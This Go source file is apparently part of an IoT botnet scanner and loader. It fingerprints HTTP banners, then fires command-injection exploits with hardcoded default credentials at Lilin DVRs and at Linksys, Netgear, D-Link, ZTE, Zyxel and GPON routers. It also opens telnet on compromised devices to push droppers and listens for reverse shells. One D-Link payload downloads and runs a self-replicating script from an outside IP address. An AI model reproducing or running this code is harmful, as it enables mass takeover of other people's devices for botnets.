conn.Write([]byte("GET / HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: en-GB,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nConnection: close\r\nUpgrade-Insecure-Requests: 1\r\nAuthorization: Basic " + logins[i] + "\r\n\r\n"))
|
||
|
||
bytebuf := make([]byte, 2048)
|
||
l, err := conn.Read(bytebuf)
|
||
if err != nil || l <= 0 {
|
||
zeroByte(bytebuf)
|
||
conn.Close()
|
||
return
|
||
}
|
||
|
||
if (strings.Contains(string(bytebuf), "HTTP/1.1 200") || strings.Contains(string(bytebuf), "HTTP/1.0 200")) {
|
||
authPos = i
|
||
zeroByte(bytebuf)
|
||
conn.Close()
|
||
break
|
||
} else {
|
||
zeroByte(bytebuf)
|
||
conn.Close()
|
||
continue
|
||
}
|
||
}
|
||
|
||
if (authPos == -1) {
|
||
return
|
||
}
|
||
|
||
for i := 0; i < len(paths); i++ {
|
||
|
||
conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
|
||
if err != nil {
|
||
break
|
||
}
|
||
|
||
conn.Write([]byte("POST " + paths[i] + " HTTP/1.1\r\nHost: " + target + "\r\nAccept-Encoding: gzip, deflate\r\nContent-Length: " + cntLenString + "\r\nAuthorization: Basic " + logins[authPos] + "\r\nUser-Agent: Abcd\r\n\r\n<?xml version=\"1.0\" encoding=\"UTF-8\"?><DVR Platform=\"Hi3520\"><SetConfiguration File=\"service.xml\"><![CDATA[<?xml version=\"1.0\" encoding=\"UTF-8\"?><DVR Platform=\"Hi3520\"><Service><NTP Enable=\"True\" Interval=\"20000\" Server=\"time.nist.gov&" + lilinPayload + ";echo DONE\"/></Service></DVR>]]></SetConfiguration></DVR>\r\n\r\n"))
|
||
|
||
bytebuf := make([]byte, 2048)
|
||
l, err := conn.Read(bytebuf)
|
||
if err != nil || l <= 0 {
|
||
zeroByte(bytebuf)
|
||
conn.Close()
|
||
continue
|
||
}
|
||
|
||
if (strings.Contains(string(bytebuf), "HTTP/1.1 200") || strings.Contains(string(bytebuf), "HTTP/1.0 200")) {
|
||
pathPos = i
|
||
zeroByte(bytebuf)
|
||
conn.Close()
|
||
fmt.Printf("\x1b[38;5;46mLilin\x1b[38;5;15m: \x1b[38;5;134m%s\x1b[38;5;15m payload sent to device\x1b[38;5;15m\r\n", target)
|
||
payloadSent++
|
||
break
|
||
} else {
|
||
zeroByte(bytebuf)
|
||
conn.Close()
|
||
continue
|
||
}
|
||
}
|
||
|
||
if (pathPos != -1) {
|
||
|
||
conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
|
||
if err != nil {
|
||
return
|
||
}
|
||
|
||
conn.Write([]byte("POST " + paths[pathPos] + " HTTP/1.1\r\nHost: " + target + "\r\nAccept-Encoding: gzip, deflate\r\nContent-Length: 281\r\nAuthorization: Basic " + logins[authPos] + "\r\nUser-Agent: Abcd\r\n\r\n<?xml version=\"1.0\" encoding=\"UTF-8\"?><DVR Platform=\"Hi3520\"><SetConfiguration File=\"service.xml\"><![CDATA[<?xml version=\"1.0\" encoding=\"UTF-8\"?><DVR Platform=\"Hi3520\"><Service><NTP Enable=\"True\" Interval=\"20000\" Server=\"time.nist.gov\"/></Service></DVR>]]></SetConfiguration></DVR>\r\n\r\n"))
|
||
|
||
bytebuf = make([]byte, 2048)
|
||
l, err := conn.Read(bytebuf)
|
||
if err != nil || l <= 0 {
|
||
zeroByte(bytebuf)
|
||
conn.Close()
|
||
return
|
||
}
|
||
|
||
if (strings.Contains(string(bytebuf), "HTTP/1.1 200") || strings.Contains(string(bytebuf), "HTTP/1.0 200")) {
|
||
fmt.Printf("\x1b[38;5;46mLilin\x1b[38;5;15m: \x1b[38;5;134m%s\x1b[38;5;15m payload sent to device\x1b[38;5;15m\r\n", target)
|
||
payloadSent++
|
||
}
|
||
|
||
zeroByte(bytebuf)
|
||
conn.Close()
|
||
}
|
||
|
||
return
|
||
}
|
||
|
||
func infectFunctionLinksys(target string) {
|
||
|
||
var rdbuf []byte = []byte("")
|
||
|
||
conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
|
||
if err != nil {
|
||
return
|
||
}
|
||
|
||
var cntLen int = 102
|
||
cntLen += len(linksysPayload)
|
||
|
||
cntLneStr := strconv.Itoa(cntLen)
|
||
|
||
conn.Write([]byte("POST /tmUnblock.cgi HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nContent-Length: " + cntLneStr + "\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\nsubmit_button=&change_action=&action=&commit=0&ttcp_num=2&ttcp_size=2&ttcp_ip=-h+%60" + linksysPayload + "%60&StartEPI=1\r\n\r\n"))
|
||
|
||
tmpbuf := make([]byte, 128)
|
||
ln, err := conn.Read(tmpbuf)
|
||
if ln <= 0 || err != nil {
|
||
conn.Close()
|
||
}
|
||
|
||
if strings.Contains(string(tmpbuf), "200") || strings.Contains(string(tmpbuf), "301") || strings.Contains(string(tmpbuf), "302") {
|
||
fmt.Printf("\x1b[38;5;46mLinksys\x1b[38;5;15m: \x1b[38;5;134m%s\x1b[38;5;15m payload sent to device\x1b[38;5;15m\r\n", target)
|
||
}
|
||
|
||
zeroByte(rdbuf)
|
||
conn.Close()
|
||
}
|
||
|
||
func infectFunctionMagic(target string) {
|
||
|
||
ipslit := strings.Split(target, ":")
|
||
|
||
for i := 0; i < len(magicPorts); i++ {
|
||
portVal := strconv.Itoa(magicPorts[i])
|
||
magicGroup.Add(1)
|
||
go infectFunctionMagicProto(ipslit[0] + ":" + portVal)
|
||
}
|
||
|
||
magicGroup.Wait()
|
||
}
|
||
|
||
func infectFunctionDlink(target string) {
|
||
|
||
var rdbuf []byte = []byte("")
|
||
|
||
conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
|
||
if err != nil {
|
||
return
|
||
}
|
||
|
||
rand.Seed(time.Now().UnixNano())
|
||
telnetPort := rand.Intn(50000) + 10000
|
||
|
||
conn.Write([]byte("POST /command.php HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 24\r\n\r\ncmd=telnetd%20-p%20" + strconv.Itoa(telnetPort) + "\r\n\r\n"))
|
||
|
||
tmpbuf := make([]byte, 128)
|
||
ln, err := conn.Read(tmpbuf)
|
||
if ln <= 0 || err != nil {
|
||
conn.Close()
|
||
}
|
||
|
||
time.Sleep(10 * time.Second)
|
||
ipslit := strings.Split(target, ":")
|
||
go telnetLoader(ipslit[0] + ":" + strconv.Itoa(telnetPort), 0, "mips", loaderDlinkTag)
|
||
go telnetLoader(ipslit[0] + ":" + strconv.Itoa(telnetPort), 0, "mpsl", loaderDlinkTag)
|
||
go telnetLoader(ipslit[0] + ":" + strconv.Itoa(telnetPort), 0, "arm7", loaderDlinkTag)
|
||
go telnetLoader(ipslit[0] + ":" + strconv.Itoa(telnetPort), 0, "arm", loaderDlinkTag)
|
||
zeroByte(rdbuf)
|
||
conn.Close()
|
||
}
|
||
|
||
func infectFunctionZyxelTwo(target string) {
|
||
|
||
var rdbuf []byte = []byte("")
|
||
|
||
conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
|
||
if err != nil {
|
||
return
|
||
}
|
||
|
||
var cntLen int = 119
|
||
cntLen += len(zyxelPayloadTwo)
|
||
|
||
conn.Write([]byte("POST /cgi-bin/ViewLog.asp HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozia/5.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nContent-Length: " + strconv.Itoa(cntLen) + "\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\nremote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3B" + zyxelPayloadTwo + "%3B%23&remoteSubmit=Save^[[A\r\n\r\n"))
|
||
|
||
tmpbuf := make([]byte, 128)
|
||
ln, err := conn.Read(tmpbuf)
|
||
if ln <= 0 || err != nil {
|
||
conn.Close()
|
||
}
|
||
|
||
zeroByte(rdbuf)
|
||
conn.Close()
|
||
}
|
||
|
||
func infectFunctionNetgear(target string) {
|
||
|
||
var rdbuf []byte = []byte("")
|
||
|
||
conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
|
||
if err != nil {
|
||
return
|
||
}
|
||
|
||
var cntLen int = 42
|
||
cntLen += len(netgearPayload)
|
||
|
||
conn.Write([]byte("POST /dnslookup.cgi HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nContent-Length: " + strconv.Itoa(cntLen) + "\r\nContent-Type: application/x-www-form-urlencoded\r\nAuthorization: Basic YWRtaW46cGFzc3dvcmQ=\r\n\r\nhost_name=www.google.com%3B+" + netgearPayload + "&lookup=Lookup\r\n\r\n"))
|
||
|
||
tmpbuf := make([]byte, 128)
|
||
ln, err := conn.Read(tmpbuf)
|
||
if ln <= 0 || err != nil {
|
||
conn.Close()
|
||
}
|
||
|
||
zeroByte(rdbuf)
|
||
conn.Close()
|
||
}
|
||
|
||
func infectFunctionZte(target string) {
|
||
|
||
var rdbuf []byte = []byte("")
|
||
|
||
conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
|
||
if err != nil {
|
||
return
|
||
}
|
||
|
||
var cntLen int = 80
|
||
cntLen += len(ztePayload)
|
||
|
||
conn.Write([]byte("POST /web_shell_cmd.gch HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nContent-Length: " + strconv.Itoa(cntLen) + "\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\nIF_ACTION=apply&IF_ERRORSTR=SUCC&IF_ERRORPARAM=SUCC&IF_ERRORTYPE=-1&Cmd=" + ztePayload + "&CmdAck=\r\n\r\n"))
|
||
|
||
tmpbuf := make([]byte, 128)
|
||
ln, err := conn.Read(tmpbuf)
|
||
if ln <= 0 || err != nil {
|
||
conn.Close()
|
||
}
|
||
|
||
zeroByte(rdbuf)
|
||
conn.Close()
|
||
}
|
||
|
||
func infectFunctionNetgearTwo(target string) {
|
||
|
||
var rdbuf []byte = []byte("")
|
||
|
||
conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
|
||
if err != nil {
|
||
return
|
||
}
|
||
|
||
conn.Write([]byte("GET /None?writeData=true®info=0&macAddress=%20001122334455%20-c%200%20;" + netgearPayload + ";%20echo%20 HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\n\r\n"))
|
||
|
||
tmpbuf := make([]byte, 128)
|
||
ln, err := conn.Read(tmpbuf)
|
||
if ln <= 0 || err != nil {
|
||
conn.Close()
|
||
}
|
||
|
||
zeroByte(rdbuf)
|
||
conn.Close()
|
||
}
|
||
|
||
func infectFunctionNetgearThree(target string) {
|
||
|
||
var rdbuf []byte = []byte("")
|
||
|
||
conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
|
||
if err != nil {
|
||
return
|
||
}
|
||
|
||
var cntLen int = 81
|
||
cntLen += len(netgearPayload)
|
||
|
||
conn.Write([]byte("POST /ping.cgi HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nreferer: " + target + "/DIAG_diag.htm\r\nContent-Length: " + strconv.Itoa(cntLen) + "\r\nContent-Type: application/x-www-form-urlencoded\r\nAuthorization: Basic YWRtaW46cGFzc3dvcmQ=\r\n\r\nIPAddr1=12&IPAddr2=12&IPAddr3=12&IPAddr4=12&ping=Ping&ping_IPAddr=12.12.12.12%3B+" + netgearPayload+ "\r\n\r\n"))
|
||
|
||
tmpbuf := make([]byte, 128)
|
||
ln, err := conn.Read(tmpbuf)
|
||
if ln <= 0 || err != nil {
|
||
conn.Close()
|
||
}
|
||
|
||
zeroByte(rdbuf)
|
||
conn.Close()
|
||
}
|
||
|
||
func infectFunctionNetgearFour(target string) {
|
||
|
||
var rdbuf []byte = []byte("")
|
||
|
||
conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
|
||
if err != nil {
|
||
return
|
||
}
|
||
|
||
conn.Write([]byte("GET /cgi-bin/;" + netgearPayload + " HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\n\r\n"))
|
||
|
||
tmpbuf := make([]byte, 128)
|
||
ln, err := conn.Read(tmpbuf)
|
||
if ln <= 0 || err != nil {
|
||
conn.Close()
|
||
}
|
||
|
||
zeroByte(rdbuf)
|
||
conn.Close()
|
||
}
|
||
|
||
func infectFunctionGponOG(target string) {
|
||
|
||
var rdbuf []byte = []byte("")
|
||
|
||
conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
|
||
if err != nil {
|
||
return
|
||
}
|
||
|
||
var cntLen int = 68
|
||
cntLen += len(gponOGPayload)
|
||
|
||
conn.Write([]byte("POST /GponForm/diag_Form?images/ HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nContent-Length: " + strconv.Itoa(cntLen) + "\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\nXWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=%60" + gponOGPayload + "&ipv=0\r\n\r\n"))
|
||
|
||
tmpbuf := make([]byte, 128)
|
||
ln, err := conn.Read(tmpbuf)
|
||
if ln <= 0 || err != nil {
|
||
conn.Close()
|
||
}
|
||
|
||
zeroByte(rdbuf)
|
||
conn.Close()
|
||
}
|
||
|
||
func infectFunctionLinksysTwo(target string) {
|
||
|
||
var rdbuf []byte = []byte("")
|
||
|
||
conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
|
||
if err != nil {
|
||
return
|
||
}
|
||
|
||
var cntLen int = 159
|
||
cntLen += len(linksysTwoPayload)
|
||
|
||
conn.Write([]byte("POST /apply.cgi HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nContent-Length: " + strconv.Itoa(cntLen) + "\r\nContent-Type: application/x-www-form-urlencoded\r\nAuthorization: Basic YWRtaW46YWRtaW4=\r\n\r\nsubmit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&ping_ip=127.0.0.1&ping_size=%26" + linksysTwoPayload + "&ping_times=5&traceroute_ip=127.0.0.1\r\n\r\n"))
|
||
|
||
tmpbuf := make([]byte, 128)
|
||
ln, err := conn.Read(tmpbuf)
|
||
if ln <= 0 || err != nil {
|
||
conn.Close()
|
||
}
|
||
|
||
zeroByte(rdbuf)
|
||
conn.Close()
|
||
}
|
||
|
||
func infectFunctionLinksysThree(target string) {
|
||
|
||
var rdbuf []byte = []byte("")
|
||
|
||
conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
|
||
if err != nil {
|
||
return
|
||
}
|
||
|
||
var cntLen int = 23
|
||
cntLen += len(linksysTwoPayload)
|
||
|
||
conn.Write([]byte("POST /debug.cgi HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: python-requests/2.21.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nContent-Length: " + strconv.Itoa(cntLen) + "\r\nContent-Type: application/x-www-form-urlencoded\r\nAuthorization: Basic R2VtdGVrOmdlbXRla3N3ZA==\r\n\r\ndata1=" + linksysTwoPayload + "&command=ui_debug\r\n\r\n"))
|
||
|
||
tmpbuf := make([]byte, 128)
|
||
ln, err := conn.Read(tmpbuf)
|
||
if ln <= 0 || err != nil {
|
||
conn.Close()
|
||
}
|
||
|
||
zeroByte(rdbuf)
|
||
conn.Close()
|
||
}
|
||
|
||
func infectFunctionDlinkTwo(target string) {
|
||
|
||
var rdbuf []byte = []byte("")
|
||
|
||
conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
|
||
if err != nil {
|
||
return
|
||
}
|
||
|
||
var cntLen int = 91
|
||
cntLen += len(dlinkTwoPayload)
|
||
|
||
conn.Write([]byte("POST /setSystemCommand HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nContent-Length: " + strconv.Itoa(cntLen) + "\r\nAuthorization: Basic YWRtaW46\r\n\r\nReplySuccessPage=docmd.htm&ReplyErrorPage=docmd.htm&SystemCommand=" + dlinkTwoPayload + "&ConfigSystemCommand=Save\r\n\r\n"))
|
||
|
||
tmpbuf := make([]byte, 128)
|
||
ln, err := conn.Read(tmpbuf)
|
||
if ln <= 0 || err != nil {
|
||
conn.Close()
|
||
}
|
||
|
||
zeroByte(rdbuf)
|
||
conn.Close()
|
||
}
|
||
|
||
func infectFunctionDlinkThree(target string) {
|
||
|
||
var rdbuf []byte = []byte("")
|
||
|
||
conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
|
||
if err != nil {
|
||
return
|
||
}
|
||
|
||
var cntLen int = 20
|
||
cntLen += len(dlinkTwoPayload)
|
||
|
||
conn.Write([]byte("POST /diagnostic.php HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nContent-Length: " + strconv.Itoa(cntLen) + "\r\n\r\nact=ping&dst=%26 " + dlinkTwoPayload + "%26\r\n\r\n"))
|
||
|
||
tmpbuf := make([]byte, 128)
|
||
ln, err := conn.Read(tmpbuf)
|
||
if ln <= 0 || err != nil {
|
||
conn.Close()
|
||
}
|
||
|
||
zeroByte(rdbuf)
|
||
conn.Close()
|
||
}
|
||
|
||
func infectFunctionDlinkFour(target string) {
|
||
|
||
var rdbuf []byte = []byte("")
|
||
|
||
conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
|
||
if err != nil {
|
||
return
|
||
}
|
||
|
||
conn.Write([]byte("GET /cgi-bin/gdrive.cgi?cmd=4&f_gaccount=;" + dlinkTwoPayload +";echo%207yeB8BQB2ycGRCT8LmsmttUWPggWykhK; HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\n\r\n"))
|
||
|
||
tmpbuf := make([]byte, 128)
|
||
ln, err := conn.Read(tmpbuf)
|
||
if ln <= 0 || err != nil {
|
||
conn.Close()
|
||
}
|
||
|
||
zeroByte(rdbuf)
|
||
conn.Close()
|
||
}
|
||
|
||
func infectFunctionDlinkFive(target string) {
|
||
|
||
var rdbuf []byte = []byte("")
|
||
|
||
conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
|
||
if err != nil {
|
||
return
|
||
}
|
||
|
||
conn.Write([]byte("GET /login.cgi?cli=multilingual%20show';" + dlinkTwoPayload + "'$ HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\n\r\n"))
|
||
|
||
tmpbuf := make([]byte, 128)
|
||
ln, err := conn.Read(tmpbuf)
|
||
if ln <= 0 || err != nil {
|
||
conn.Close()
|
||
}
|
||
|
||
zeroByte(rdbuf)
|
||
conn.Close()
|
||
}
|
||
|
||
func infectFunctionDlinkSix(target string) {
|
||
|
||
var rdbuf []byte = []byte("")
|
||
|
||
conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
|
||
if err != nil {
|
||
return
|
||
}
|
||
|
||
conn.Write([]byte("GET / HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nCookie: i=`" + dlinkTwoPayload + "`\r\n\r\n"))
|
||
|
||
tmpbuf := make([]byte, 128)
|
||
ln, err := conn.Read(tmpbuf)
|
||
if ln <= 0 || err != nil {
|
||
conn.Close()
|
||
}
|
||
|
||
zeroByte(rdbuf)
|
||
conn.Close()
|
||
}
|
||
|
||
func infectFunctionDlinkSeven(target string) {
|
||
|
||
var rdbuf []byte = []byte("")
|
||
|
||
conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
|
||
if err != nil {
|
||
return
|
||
}
|
||
|
||
conn.Write([]byte("POST /hedwig.cgi HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nCookie: uid=uAMwOEeRuqDZptt4JHrQuakNv2g3eR9kqnvDUvAkaRD561YFVty3uXFAls6bcARYA5w5KpUrDlY7pdAXuG0AuhHSfBCQJoPDqxdjszcAWwQYxOEf6Sy9t8iU4PV1xNyVxDMPqZwR7a5dthsW8jLiK0ha1qUksjWYna5IaYoOYIM7aiT3mrseuskJWVONKXFQQw64tNsAAmrfIc9OobZ4gxQibsOsHkZoqz5C1ScGYmMaWeICXuF1J2R1FIzGkXOr3OXjKXQ8C6ZeSbRRmEBF8GaJPJ87wiVlDAXj6QsyKSWDzjqTWqS9rxBnx39xwO9e02kJibbjxAW93SsX7rfKmUH4hN0H1j8dqYGhpPWL0CSELCM7NwWSjs5ofrkRivAE5bI3rnlSsMeyvPGmRjGhSH6Z5kWDAVQ5bUztFAALVyl0nPl9fl2FgmLNCPmqx9VMNMsFTnOfv4hVP9wNiN1WYTeHRCrLeB9THv1uzipH8utX2Y7Cv5iaxSMYZOUVG2puqPAYc2QzfdkEgrIOuIOZIUXQvYGF35rIkMW8eYuiVKqejKbXaM8B6RfiBTCTAHJpRMnkp5L9HorqZNwX6lpyH62slJG4iS3Yz31SrgBV5PDANkFw92G6qtT8kvbHfzoI2kyJKQa67TSDHhZLgfUHMsFFLwZTZwiXlZIzDFimYbdTaz8KWF0POFoqyGs5oynMDic8VvwS2rGsALvVHYWa885i4CIrwyEOnkY6Mqvmv96osjP1Br3GWARZPpnwGoWc7dVLvZVDLW1ObRFg1bX8qDUdxv4jcGGwZdK5wz2bJoNoyEWIkFVcQldDxjaQNdokjCmJxoEGRUGYyZshnx1fYqLH3Mc3K9DcB7xhZdbdBAohXpzYr7OXpTFHZp7THrBE1i8VvvoaF1bBXsBrasf4fwYtVUrtgPHVnlq1oN2uoO6qfLZLz49u1QxK6qBGsQG2pJa6rxYmcHEPt<50><74><EFBFBD>*vk3aG0Vgy2692qgW<67>ٰ*crxdla7qucxf<78>ذ*qzoFOTyzL063ZRDecd /tmp;wget http://37.0.11.220/a/wget.sh;chmod 777 wget.sh;sh wget.sh selfrep.dlink;rm -rf wget.sh;\r\nContent-Length: 15\r\n\r\nL0PTJUj=NX9zke5\r\n\r\n"))
|
||
|
||
tmpbuf := make([]byte, 128)
|
||
ln, err := conn.Read(tmpbuf)
|
||
if ln <= 0 || err != nil {
|
||
conn.Close()
|
||
}
|
||
|
||
zeroByte(rdbuf)
|
||
conn.Close()
|
||
}
|
||
|
||
func infectFunctionDlinkEight(target string) {
|
||
|
||
var rdbuf []byte = []byte("")
|
||
|
||
conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
|
||
if err != nil {
|
||
return
|
||
}
|
||
|
||
conn.Write([]byte("POST /HNAP1/ HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nSOAPAction: \"http://purenetworks.com/HNAP1/GetDeviceSettings/`cd && cd tmp && export PATH=$PATH:. && " + dlinkThreePayload + "`\"\r\nContent-Length: 0\r\n\r\n"))
|
||
|
||
tmpbuf := make([]byte, 128)
|
||
ln, err := conn.Read(tmpbuf)
|
||
if ln <= 0 || err != nil {
|
||
conn.Close()
|
||
}
|
||
|
||
zeroByte(rdbuf)
|
||
conn.Close()
|
||
}
|
||
|
||
|
||
func scannerAddExploit(name string, function interface{}) {
|
||
|
||
exploitMap[name] = function
|
||
}
|
||
|
||
func scannerInitExploits() {
|
||
|
||
exploitMap = make(map[string]interface{})
|
||
|
||
scannerAddExploit("Basic realm=\"DVR\"", infectFunctionLilinDvr)
|
||
scannerAddExploit("uc-httpd 1.0.0", infectFunctionUchttpd)
|
||
scannerAddExploit("AuthInfo:", infectFunctionTvt)
|
||
scannerAddExploit("CMS Web Viewer", infectFunctionMagic)
|
||
scannerAddExploit("Server: GoAhead-Webs", infectFunctionFiberhome)
|
||
scannerAddExploit("Server: DWS", infectFunctionVigor)
|
||
scannerAddExploit("Basic realm=\"Broadband Router\"", infectFunctionComtrend)
|
||
scannerAddExploit("Basic realm=\"Broadband Router\"", infectFunctionBroadcom)
|
||
scannerAddExploit("Server: Boa/0.93.15", infectFunctionGponFiber)
|
||
scannerAddExploit("TOTOLINK", infectFunctionTotolink)
|
||
scannerAddExploit("Server: Boa/0.94.14", infectFunctionRealtek)
|
||
scannerAddExploit("Basic realm=\"Server Status\"", infectFunctionHongdian)
|
||
scannerAddExploit("Server: Http Server", infectFunctionTenda)
|
||
scannerAddExploit(",/playzone,/", infectFunctionZyxel)
|
||
scannerAddExploit("Linksys E", infectFunctionLinksys)
|
||
|
||
// Exploit spray for devices we cant identify
|
||
scannerAddExploit("HTTP/1.", infectFunctionAlcatel)
|
||
scannerAddExploit("HTTP/1.", infectFunctionZyxelTwo)
|
||
scannerAddExploit("HTTP/1.", infectFunctionZte)
|
||
scannerAddExploit("HTTP/1.", infectFunctionNetgear)
|
||
scannerAddExploit("HTTP/1.", infectFunctionNetgearTwo)
|
||
scannerAddExploit("HTTP/1.", infectFunctionNetgearThree)
|
||
scannerAddExploit("HTTP/1.", infectFunctionNetgearFour)
|
||
scannerAddExploit("HTTP/1.", infectFunctionGponOG)
|
||
scannerAddExploit("HTTP/1.", infectFunctionLinksysTwo)
|
||
scannerAddExploit("HTTP/1.", infectFunctionLinksysThree)
|
||
scannerAddExploit("HTTP/1.", infectFunctionDlink)
|
||
scannerAddExploit("HTTP/1.", infectFunctionDlinkTwo)
|
||
scannerAddExploit("HTTP/1.", infectFunctionDlinkThree)
|
||
scannerAddExploit("HTTP/1.", infectFunctionDlinkFour)
|
||
scannerAddExploit("HTTP/1.", infectFunctionDlinkFive)
|
||
scannerAddExploit("HTTP/1.", infectFunctionDlinkSix)
|
||
scannerAddExploit("HTTP/1.", infectFunctionDlinkSeven)
|
||
scannerAddExploit("HTTP/1.", infectFunctionDlinkEight)
|
||
|
||
}
|
||
|
||
func httpBannerCheck(target string) {
|
||
|
||
conn, err := net.DialTimeout("tcp", target, netTimeout * time.Second)
|
||
if err != nil {
|
||
workerGroup.Done()
|
||
return
|
||
}
|
||
|
||
conn.Write([]byte("GET / HTTP/1.1\r\nHost: " + target + "\r\n\r\n"))
|
||
|
||
for {
|
||
bytebuf := make([]byte, 2048)
|
||
l, err := conn.Read(bytebuf)
|
||
if err != nil || l <= 0 {
|
||
zeroByte(bytebuf)
|
||
conn.Close()
|
||
workerGroup.Done()
|
||
return
|
||
}
|
||
|
||
for key, element := range exploitMap {
|
||
if strings.Contains(string(bytebuf), key) {
|
||
switch function := element.(type) {
|
||
case func(string):
|
||
function(target)
|
||
default:
|
||
break
|
||
}
|
||
}
|
||
}
|
||
}
|
||
|
||
workerGroup.Done()
|
||
return
|
||
}
|
||
|
||
func main() {
|
||
|
||
go func() {
|
||
i := 0
|
||
for {
|
||
fmt.Printf("%d's | Payload Sent: %d | Telnet Opened: %d\r\n", i, payloadSent, telShells)
|
||
time.Sleep(1 * time.Second)
|
||
i++
|
||
}
|
||
} ()
|
||
|
||
dropperMap = make(map[string]echoDropper)
|
||
telnetLoadDroppers()
|
||
scannerInitExploits()
|
||
|
||
li, err := net.Listen("tcp", "0.0.0.0:" + strconv.Itoa(ucRshellPort))
|
||
if err != nil {
|
||
return
|
||
}
|
||
|
||
recvServ, err := net.Listen("tcp", "0.0.0.0:19412")
|
||
if err != nil {
|
||
return
|
||
}
|
||
|
||
go func() {
|
||
for {
|
||
conn, err := li.Accept()
|
||
if err != nil {
|
||
break
|
||
}
|
||
|
||
go reverseShellUchttpdLoader(conn)
|
||
}
|
||
} ()
|
||
|
||
go func() {
|
||
for {
|
||
conn, err := recvServ.Accept()
|
||
if err != nil {
|
||
break
|
||
}
|
||
|
||
for {
|
||
buf := make([]byte, 32)
|
||
l, err := conn.Read(buf)
|
||
if l <= 0 || err != nil {
|
||
conn.Close()
|
||
break
|
||
}
|
||
|
||
workerGroup.Add(1)
|
||
go httpBannerCheck(string(buf))
|
||
}
|
||
}
|
||
} ()
|
||
|
||
for {
|
||
reader := bufio.NewReader(os.Stdin)
|
||
input := bufio.NewScanner(reader)
|
||
|
||
for input.Scan() {
|
||
if os.Args[1] == "listen" {
|
||
workerGroup.Add(1)
|
||
go httpBannerCheck(input.Text())
|
||
} else {
|
||
workerGroup.Add(1)
|
||
go httpBannerCheck(input.Text() + ":" + os.Args[1])
|
||
}
|
||
}
|
||
}
|
||
}
|